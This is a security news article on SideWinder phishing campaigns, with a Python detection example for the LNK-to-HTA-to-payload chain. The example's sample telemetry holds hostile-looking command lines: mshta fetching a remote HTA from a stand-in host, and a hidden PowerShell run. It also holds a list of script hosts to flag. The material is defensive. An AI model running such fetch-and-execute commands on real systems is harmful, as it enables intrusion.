SideWinder is apparently an India-based advanced persistent threat (APT) group known for spreading malware, infiltrating networks, and stealing sensitive information.
Security researchers at Group-IB have succeeded in linking a series of phishing campaigns conducted between June and November 2021 to an Indian advanced persistent threat (APT) group, SideWinder.
The suspected state-sponsored group has targeted 61 government, military, law enforcement, and other organizations across the Asia-Pacific region, according to a report from Group-IB.
Also known as Rattlesnake, Hardcore Nationalist (HN2), and T-APT4, the group is considered one of the oldest nation-state groups, with activity dating back to 2012. In January 2020, the group was found to be infecting Android devices with malware through the Play Store.
In another attack reported in February 2022, SideWinder was observed collaborating with another group called ModifiedElephant and targeting unsuspecting users by planting incriminating evidence on their devices.
In June of last year, the group’s custom tool, SideWinder.AntiBot.Script, was used in previously undocumented phishing attacks against Pakistani organizations. The group was also linked to an attack on the Maldivian government in 2020.
Like many other APT groups, SideWinder uses spear phishing as its initial attack vector, sending phishing emails containing malicious attachments or URLs to victims. Two of these campaigns featured emails in which the group impersonated a cryptocurrency firm, said Group-IB.
If a user clicks on the link or opens the attachment, a malicious document, an LNK file, or a payload is downloaded onto their computer. In the LNK case, the LNK file downloads an HTA file, which in turn downloads the payload. This payload could be either a remote access Trojan (RAT) or an information stealer, according to Group-IB’s technical analysis.
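The LNK-to-HTA-to-payload chain above leaves a recognisable trace in process-creation telemetry. The following is an added example (not part of the Group-IB report and not the group's or Group-IB's code) that flags that chain: it assumes a Sysmon-style event shape (pid, parent pid, image name, command line), relies on the fact that Windows runs .hta files through mshta.exe, and uses constructed sample events.

```python
"""Flag the LNK -> HTA -> payload chain in process-creation events.

Added example for illustration; event layout and sample data are assumed,
not taken from the Group-IB report.
"""
import re
from dataclasses import dataclass

# Windows executes .hta files with mshta.exe; a remote URL on its command
# line is the hallmark of the second stage of the chain (LNK fetches HTA).
HTA_HOST = "mshta.exe"
REMOTE_URL = re.compile(r"https?://\S+", re.IGNORECASE)
# Third-stage loaders a defender would expect mshta.exe to spawn.
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "rundll32.exe"}


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # basename of the executable
    cmdline: str


def detect_lnk_hta_chain(events):
    """Return alert strings for events matching the LNK -> HTA -> payload pattern."""
    by_pid = {e.pid: e for e in events}
    alerts = []
    for e in events:
        parent = by_pid.get(e.ppid)
        # Stage 2: a shortcut opened from Explorer spawns mshta.exe with a remote HTA.
        url = REMOTE_URL.search(e.cmdline)
        if e.image.lower() == HTA_HOST and url:
            src = parent.image if parent else "unknown"
            alerts.append(f"stage2: {src} -> mshta.exe fetching {url.group(0)}")
        # Stage 3: mshta.exe spawns a script host or loader to run the payload.
        if parent and parent.image.lower() == HTA_HOST and e.image.lower() in SCRIPT_HOSTS:
            alerts.append(f"stage3: mshta.exe -> {e.image} ({e.cmdline[:60]})")
    return alerts


# Constructed sample telemetry (not real campaign data).
SAMPLE = [
    ProcEvent(100, 1, "explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, "mshta.exe", "mshta.exe https://example.invalid/update.hta"),
    ProcEvent(300, 200, "powershell.exe", "powershell.exe -w hidden -File stage3.ps1"),
    ProcEvent(400, 100, "winword.exe", '"winword.exe" report.docx'),
    ProcEvent(500, 100, "mshta.exe", "mshta.exe C:\\Vendor\\setup.hta"),  # local HTA, not flagged
]

if __name__ == "__main__":
    for alert in detect_lnk_hta_chain(SAMPLE):
        print(alert)
```

Only the remote-URL case is flagged as stage 2 here; a locally installed .hta is left alone to keep the rule low-noise, so it should be tuned to the environment.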
Group-IB also discovered two new custom-made SideWinder tools during the campaign: SideWinder.RAT.b, a RAT, and SideWinder.StealerPy, an information stealer.
The information stealer is capable of collecting Google Chrome browsing history, credentials saved in the browser, the list of folders in the directory, meta-information, the contents of .docx, .pdf, and .txt files, and more.
The APT group’s motive seems to be linked to India’s cryptocurrency market, Group-IB’s report speculates.
“Interestingly, Group-IB analysts discovered two phishing projects mimicking crypto companies. SideWinder’s growing interest in cryptocurrency could be linked to the recent attempts to regulate the crypto market in India.”
However, Group-IB cannot confirm how many, if any, of these phishing campaigns were successful. Nevertheless, users and organizations must take precautions against SideWinder’s attacks, starting with the following steps:
Keep your software up to date: Make sure your operating system and all your software are up to date with the latest security patches. This will help protect you against known vulnerabilities that could be exploited by SideWinder.
Use strong passwords: Use complex and unique passwords for all your accounts and enable two-factor authentication whenever possible. This can help prevent unauthorized access to your accounts and make it more difficult for SideWinder to gain access.
Be cautious of phishing emails: SideWinder often uses phishing emails to trick users into clicking on a malicious link or downloading a malicious attachment. Be cautious of emails from unknown senders, and do not click on links or download attachments unless you are sure they are safe.
Use anti-malware software: Install and use anti-malware software to help detect and prevent SideWinder attacks. Make sure your anti-malware software is up to date and set to automatically scan your system on a regular basis.
Limit access to sensitive information: Limit the number of people who have access to sensitive information, and use encryption to protect data that is transmitted or stored.
Train employees: Train employees on how to recognize and avoid SideWinder attacks. Educate them on safe browsing habits, how to identify phishing emails, and the importance of keeping software up to date.